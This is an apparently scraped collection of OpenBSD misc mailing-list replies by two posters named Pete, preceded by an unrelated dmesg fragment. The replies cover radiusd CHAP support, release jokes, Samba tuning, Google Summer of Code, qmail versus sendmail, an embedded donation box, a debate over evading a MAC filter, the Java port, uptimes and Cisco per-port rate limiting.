acpibtn0 at acpi0: LID0
"APP0002" at acpi0 not configured
acpibtn1 at acpi0: PWRB
acpibtn2 at acpi0: SLPB
"APP0001" at acpi0 not configured
"APP0003" at acpi0 not configured
"ACPI0002" at acpi0 not configured
acpibat0 at acpi0: BAT0 not present
acpivideo0 at acpi0: GFX0
cpu0: Enhanced SpeedStep 1197 MHz: speeds: 2400, 2200, 2000, 1800, 1600, 1400,
1200, 800 MHz
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "Intel GM965 Host" rev 0x03
inteldrm0 at pci0 dev 2 function 0 "Intel GM965 Video" rev 0x03
drm0 at inteldrm0
intagp0 at inteldrm0
agp0 at intagp0: aperture at 0x8000, size 0x1000
inteldrm0: msi
inteldrm0: 1280x800
wsdisplay0 at inteldrm0 mux 1: console (std, vt100 emulation)
wsdisplay0: screen 1-5 added (std, vt100 emulation)
"Intel GM965 Video" rev 0x03 at pci0 dev 2 function 1 not configured
uhci0 at pci0 dev 26 function 0

non-PAP in radiusd

[Pete Zabagel]

Hello friends,

I noticed in the radiusd.conf man page that the bsdauth module only
supports PAP:

"It only supports PAP, password based authentication."

Is there a specific reason as to why CHAP isn't implemented? I am
assuming it is due to time / interest constraints but perhaps the
quality of CHAP is in question too -- I see in the RFC that MD5 is
assigned a specific value, making me wonder if MD5 is the predominant
algorithm of CHAP implementations in the wild and perhaps considered
insecure by the community.

On a side note, does anyone know which algorithms are used in CHAP
besides MD5?

Thanks,

Pete

Re: OpenBSD 6.1 Release

[Pete Zabagel]

Since 6.1 will be the first release in our "twentieth year" I hope the
foundation offers installation service where Theo shows up in a limousine
wearing a tuxedo and installs 6.1 for the princely sum of $10,000.

What do you say Theo?

-PZ

From: owner-m...@openbsd.org  on behalf of
tec...@protonmail.com 
Sent: March 1, 2017 12:07:45 PM
To: Theo de Raadt; misc@openbsd.org
Subject: Re: OpenBSD 6.1 Release

I was counting from last release on Sept 1st, my apologies.






> Wondering if anyone knows about the new release schedule? It has
> always been 6 months of course, so I presumed today would be the
> day. Probably just a little impatient and excited for this one.

Releases are generally near start of May and November.

Re: OpenBSD 6.1 Release

[Pete Zabagel]

Oh, and he needs to port it to my TAM* and stay for fancy hors d'oeuvres (beef
jerky, pop tarts and whiskey).

*http://guides.macrumors.com/Twentieth_Anniversary_Macintosh

Re: is it possible to speed up network to 1 Gb ?

[Pete Zabagel]

> The more complex the protocol, the slower the transfer.
> 85 MB/sec sounds about right for ftp in my opinion, samba may need some
> performance tuning.

Yep, I would recommend when tuning Samba to not just throw a bunch of
optimizations in there and expect it to work magically. It's better to test
with just a few (or even 1) modification first and work from there.

OpenBSD can be a little slower but the trade off for better security is worth
it IMHO.

If you going between Linux and OpenBSD NFS would also be an option (not
without it's own tuning difficulties at times).

Remember you can tune Samba but you can't tune-a-fish!

-PZ

Re: Why isn't OpenBSD in Google Summer of Code 2017?...

[Pete Zabagel]

Would the devs consider compiling a list of specific improvements they'd like
to see volunteer'd upon this summer? I'd love to help especially if it was a
group effort/friendly competition.


From: owner-m...@openbsd.org  on behalf of Bob Beck

Sent: April 2, 2017 10:16:21 PM
To: Luke Small
Cc: openbsd-misc
Subject: Re: Why isn't OpenBSD in Google Summer of Code 2017?...

We tried it for two years, it was too much effort on the part of the
foundation organizers mentors to deal with the bureaucracy involved, and we
didn't really see enough
return in terms of new developers to the project, which, frankly being
selfish on OpenBSD's part is the only reason for us to do it.

Both Ken Westerback and I organized our end of it and dealt with the google
paperwork the two years we did it, Neither of us is willing to do it again,
and while I won't
directly speak for Ken, I would not support us spending effort on this when
there are lots of other things to do.. It just doesn't have the benefit for
OpenBSD, especially
in light of the effort of the volunteers necessary to participate.



On Sun, Apr 2, 2017 at 8:54 AM, Luke Small  wrote:

Re: Replace sendmail with qmail?

[Pete Vickers]

In case it's needed (which I doubt), I'll voice my VERY strongly  
preference for sendmail instead of all these other pretenders.


/Pete


On 30 Nov 2007, at 10:25 AM, Matthew Dempsky wrote:


On 11/30/07, Peter Hessler <[EMAIL PROTECTED]> wrote:
That being said, its really easy to install qmail yourself and  
have it

replace the in-tree sendmail (see mailer.conf).


Right, and maybe for a future OpenBSD release you could swap the
placement of sendmail and qmail in that sentence. :-)

To be clear, I suggested replacing sendmail with qmail because 1) it
would further OpenBSD's efforts of eliminating unacceptably licensed
code and 2) I'm familiar with qmail, so I can actually contribute
patches.  If there's a more suitable MTA, I'd be even happier to see
it go in (as long as I can keep using qmail ;-).

Re: Embedding OpenBSD

[Pete Vickers]

step 1.  get a any old ipod on ebay
step 2. put a single mp3 tune on it
step 3. place it in a big box, with the play button located right  
under a coin sized slot


openbsd is great, but it's not the hammer for all nails...

/Pete


On 28 Dec 2007, at 3:34 AM, Nick Holland wrote:

> I've got a little project I'm working on here.
> It involves stuffing a computer in a donation box with a
> money detector, so every time someone tosses money in the box,
> it plays an MP3 file.
>
> (no, you can't make a living at this.  At least, *I* can't)
>
> The first two of these I did were many years ago, and we used a
> 486 running a simple DOS app.  Well, computers that run DOS well
> are gone, and trying to bring up a new program to play sound
> files on any of the modern sound chips would be (not) fun...and
> annoying the next time the hardware all changes again.
>
> So, for this generation, I'm using OpenBSD, mpg321, and a 1G
> CF flash device attached to an CF-> IDE interface.
>
> However, this is the first time I've ever done an OpenBSD system
> that wasn't going to be attached to some kind of network for
> (hopefully) years at a time.  In fact, hopefully, it will NEVER
> be attached to a network.  And, while I got a 1G CF device, I
> could imagine doing something stupid and having it slowly fill
> the CF media and six months from now getting a call saying, "It
> died.  Come fix it", and since it will be in another country and
> probably a ten hour drive away, I'd like to avoid that. :)
> Once this thing is deployed, I won't have access to it at all,
> so I'll have no ability to spot a potential problem or fix it.
>
> SO, to try to keep things quiet, I've disabled the daily, weekly,
> and monthly scripts, I've disabled sendmail in /etc/rc.conf.local.
> Before I ship it out, I'll move /var/log and /var/tmp to point to
> a mfs system, so hopefully, if something starts logging, a power
> cycle will dump everything.  Only 60M is mounted RW, so it fsck's
> very quickly, and my app writes only to the MFS.
>
> What have I forgotten?  Is there anything else I can do to avoid
> slapping my forehead and saying, "D'oh! Forgot to ..." before I
> ship it out fully detached?  The good news is I'm pretty sure
> there is at least one OpenBSD developer near-by, but that's just
> all the more reason to make sure I don't screw it up, I'll never
> live it down. :)
>
> Nick.

Re: avoiding a mac address filter

[Pete Vickers]

Well this sounds very much to me like 'We know (for example) Windows  
security is weak by design, but it's not MS's fault for a crap  
system, it's the bad guys fault for actually realising it'. I  
disagree, MS have no excuse for not providing sufficient/suitable  
security in their products, and may even have a legal obligation to  
do so.


Also, whilst I would never condone hacking (cracking), but I believe  
in freedom of information, and even a potential security expert must  
begin his/her learning somewhere. It is common knowledge, and freely  
available on the Internet (http://www.openbsd.org/cgi-bin/man.cgi)  
that tcpdump may allow you to watch network traffic on a shared  
medium such as WLAN, and also that ifconfig may allow  you to change  
the MAC address on your network card. Note that if your country  
interprets freedom in such a fashion that it would implicate me here,  
then this email is intended to improve the ability of a 'good guy'  
not encourage a 'bad guy'...


To put it another way, is it my fault for teaching you to drive a  
car, if you then use those skills to run down innocent pedestrians ?



/Pete



On 7 Jan 2008, at 8:28 PM, Andreas Maus wrote:


On Mon, Jan 07, 2008 at 12:19:26PM -0500, Dave Anderson wrote:

On Mon, 7 Jan 2008, Pau Amaro-Seoane wrote:


loosen up a bit, you're too tight up... I just want to check my
emails, I don't want to download p0nr movies


Theft of service is theft, regardless of how much or little service
you're stealing.  If someone's gone to the trouble of filtering on  
MAC
addresses, they've clearly indicated that they're not a public  
service

-- and no amount of weasel-wording will get around that.

ACK!

Furthermore, depending on your origin this is considered a criminal
act if you circumvent the MAC filter. E.g. here in germany you will
pay for that crime or go to jail (for up to 5 years)
doing this for a: sniffing the traffic to get a valid IP/MAC
association b: breaking into the system which is protected
(even a MAC filter is considered a protection).

And NO A SYSTEM THAT USES MAC FILTERING IS NOT AN OPEN ACCESSPOINT!

Oh and by the way it may be considered a crime trying to do or giving
you tips how to do this (incitement).

If you have a similar system at work and you will try to figure out
how bad guys may attack this ... well talk to your boss or your IT
security team. Maybe you will be assigned to a penetration test.
But in this case you have to sign an agreement what you should
do, what you shouldn't do and when and how to to such tests.
(and if you are in a position to do penetration test you wouldn't
ask such questions ;) )

So don't expect any answer on this list.

Andreas.

--
Windows 95: A 32-bit patch for a 16-bit GUI shell running on top of
an 8-bit operating system written for a 4-bit processor by a 2-bit
company who cannot stand 1 bit of competition.

Re: BSD Port from OpenJDK

[Pete Vickers]

Hi,


Whilst I fully acknowledge the stigmatism that goes with java, I'm  
very grateful to Kurt et. al. for making it run under OpenBSD. It has  
saved me from having to admin extra linux/solaris boxes many times,  
when customers insist on java. I'm also looking forward to merely  
pkg_add'ing it instead of the playing "hunt the patch after license  
clicking" that was previously necessary.


Nice work ! Appreciated.


/Pete





On 15 Oct 2008, at 02:06, Kurt Miller wrote:


On Tuesday 14 October 2008 11:13:41 am new_guy wrote:

Ben Adams-3 wrote:


Just wondering if this will effect OpenBSD with java:
Per the interim governance guidelines for Projects [1] I'm pleased
to announce the creation of the BSD Port Project



Java is nasty. There... I said it and it is true. The goopy OOP of  
Java will
tarnish anything it touches. Personally, I hope Java (in all of its  
virtual
glory) never makes it into OpenBSD at all. Real men will cry man  
tears when

OpenBSD ships with Java.



Uninformed. We've had Java for years and now we have packages:

ftp://ftp.openbsd.org/pub/OpenBSD/snapshots/packages/i386/jdk-1.7.0.00b24p2.tgz

4.4 will have packages also.

Your negativity sucks. Porting Java to OpenBSD was and is not
a trivial effort. It also serves as an excellent test bed for
threads, the runtime linker and large memory applications.

Porting Java to OpenBSD enabled the LOCKSS project to use it
for its noble goals. It uncovered deadlocks in our pthread
lib that resulted in large improvements to libpthread. Its use
of dlopen() and friends resulted in significant improvements
in our runtime linker. Oh and who made those improvements???
The same person who took the time to port Java to OpenBSD!! Me
and other OpenBSD developers who saw the need to improve things.

BTW, all those system level improvements have made significant
stability gains for applications like firefox, KDE, OpenOffice,
Asterisk, etc, etc which all use threads and dlopen() alot.

Quite frankly I'm pretty upset at all the 'Java sucks' banter on
misc. If you and the other naysayers don't realize that porting
Java to OpenBSD was a 'Good-Thing' then you are just UNINFORMED!

-Kurt

Re: Longest Uptime?

[Pete Vickers]

Okai,

here's my $0.02 on the subject:

http://systemnet.no/ios-uptime.jpg


/Pete







On 29 Oct 2008, at 18:49, guilherme m. schroeder wrote:


Hi,

Uptimes sucks. Here's the biggest i've ever seen in the company i  
work:


[EMAIL PROTECTED] ~]$ uname -a
SunOS optg998 5.6 Generic_105181-26 sun4u sparc SUNW,UltraSPARC-IIi- 
cEngine

[EMAIL PROTECTED] ~]$ uptime
 3:40pm  up 2639 day(s), 13:50,  1 user,  load average: 0.08, 0.07,  
0.06

[EMAIL PROTECTED] ~]$ date
Wed Oct 29 15:45:24 BRST 2008
[EMAIL PROTECTED] ~]$ psrinfo -v
Status of processor 0 as of: 10/29/08 15:41:07
 Processor has been on-line since 08/08/01 00:50:54.
 The sparc processor operates at 440 MHz,
   and has a sparc floating point processor.
[EMAIL PROTECTED] ~]$ dmesg | tail -5
SUNW,hme0: Using External Transceiver
SUNW,hme0: 100 Mbps half-duplex Link Up
dump on /dev/md/dsk/d50 size 2042608K
SUNW,hme0: Using External Transceiver
SUNW,hme0: full-duplex Link Up

Ok it's not OpenBSD, blame on me. But what i liked is that this
machine is working for 2639 days and it stills blink green leds. The
harddisk never gave up too. No errors on dmesg.
It's a Netra T1 machine, running our internal DNS server. I think
we'll replace it when it dies ;)

On Wed, Oct 29, 2008 at 7:15 AM, Gilles Chehade <[EMAIL PROTECTED]>  
wrote:

new_guy a icrit :


I know. Longest uptime is silly, macho, pointless stuff... but I ran
across
an old SunOS 2.6 box that had been up for 387 days. It had been  
hacked.

The
only reason it was not an open mail relay is that /var was full.  
So, I
thought to myself, "I bet I could run an OpenBSD box for that  
amount of

time
or longer without getting hacked and without doing much to it." Just
wondering what's the longest OpenBSD uptime some folks on misc  
have seen?


Thanks



It is not the size of your uptime that matters, it is what you do  
with it.


Gilles

Re: Per User Bandwidth Limiting

[Pete Vickers]

Indeed, I believe whilst c3750 support traffic-shaping, the c3550 does  
not.


BTW, instead of assigning a /30 per user as wasting 75% of your IP  
address space, try looking that the 'private vlan' IOS command, which  
should allow you to use much bigger subnets and still control the user- 
user traffic.


/Pete






On 14 Dec 2008, at 13:10, Marco Matarazzo wrote:


Hi Justin,

I have an ISP situation where there is about 1000 users sitting  
behind Cisco
3550 switches.  Each port is 1 user and is configured with an  
individual
VLAN where each VLAN is assigned a small network subnet and  
corresponding

DHCP scope.

The problem is that it seems (so I have been told) is these 3550's  
will not

effectively bandwidth limit at the port level.  Incoming bandwith is
limited
as configured, but outgoing is not.  So, I am looking at a pf  
solution but
google is not turning up any specific information for such a  
situation.




This is not true. It's more tricky, but you can actually limit both  
inbound
and outbound at the port level, and it's quite effective too. Of  
course
OpenBSD is capable of that too, but for 1000 vlans you'll have to  
split the
load across multiple firewalls (or multiple cluster of firewalls)  
since
there're hardcoded limits on the number of queues you can create  
(256 cbqs
and 64 hfsc if I remember well, it's been discussed in the past  
however!)


The config for the 3550 is something like this:

Define the class-maps (all-in and all-out are different because of  
hardware

limitations)

class-map match-any all-out
 match ip dscp default
class-map match-any all-in
 match access-group 100

Define the policy maps:

policy-map 1mbit-in
 class all-in
   police 1024000 192000 exceed-action drop
policy-map 1mbit-out
 class all-out
   police 1024000 192000 exceed-action drop

And apply the policies to the interfaces:

interface FastEthernet0/4
description CustomerX
no switchport
ip address 1.2.3.4 255.255.255.x (or if it's a switchport, just  
"switchport

mode access" and then "switchport access vlan x")
ip rip advertise 3
no cdp enable
service-policy input 1mbit-in
service-policy output 1mbit-out

Also note that this is rate-limiting, not bandwidth shaping, but it  
may fit

your requirements!

Cheers,
]\/[arco